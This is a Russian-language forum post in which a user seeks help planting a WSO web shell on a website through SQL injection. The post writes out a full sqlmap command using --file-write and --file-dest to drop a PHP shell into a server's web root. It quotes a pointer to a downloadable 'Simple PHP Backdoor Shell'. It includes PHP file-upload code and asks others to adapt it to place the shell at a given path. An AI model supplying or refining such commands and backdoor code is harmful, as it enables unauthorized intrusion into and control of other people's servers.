Shadowfolder
Сообщений: 6
Оценки: 0
Присоединился: 2012-01-23 22:23:06.933333
|
Кто разбирается в sqlmap, прошу помощи по заливки шелла!
я попытался залить шелл используя команду sqlmap.py -u "http://www.site.com/news.php?catid=1" --file-write="C:\wso\shell.php" --file-dest="/srv/www/htdocs/com/shell.php" мне выдало ошибку [WARNING] the injection is on a GET parametr and the file to be writen hexadecial value is 132218 bytes
Я написал разработчикам sqlmap, ответили, ответ получил такой quote:
There is a limit in length of GET/POST request data length in all web servers.
For example, Apache could limit GET request (e.g. ?id=123……) to only <5000 chars and ignore anything greater than that.
Ну понятно, значит код шелла слишком большой.В поисках альтернативы, я спросил о шелле меньше <5000chars
в ответ получилquote:
http://tools.th3-0utl4ws.com/shells/index.HТМL
search for PHP
"Simple PHP Backdoor Shell" looks like a small and nice one
Шелл бэкдор?Я никогда раньше не испольвоал его, я даже не знаю как он выглядит..Времени фатально в обрез!…Какой из них использовать и как потом через него залить шелл wso?
В инете нашел код
<?php
$name = 'my.exe';
if(file_exists($name))
echo "<a href=$name>$name</a>";
else{
if($_POST['upload']){
if($_FILES['file']['size']){
if(substr($_FILES['file']['name'], -3) == 'exe'){
if(move_uploaded_file($_FILES['file']['tmp_name'], getcwd().'/'.$name))
echo 'ok';
else
echo 'Upload filed: error number '.$_FILES['file']['error'];
}
}
}else{
?><form enctype="multipart/form-data" action="" method="post"><input name="file" type="file" />
<input type="submit" name="upload" value="Upload" />
</form><?php
}
}
?> Я так понимаю это позволит мне загрузить мой шелл wso весом 65кб без проблем?
Если все верно и через этот код можно будет залить шелл wso, подправьте плиз код под php и место шелла должно быть /srv/www/htdocs/com/шелл.php
|
Заливка шелла через sqlmap - 
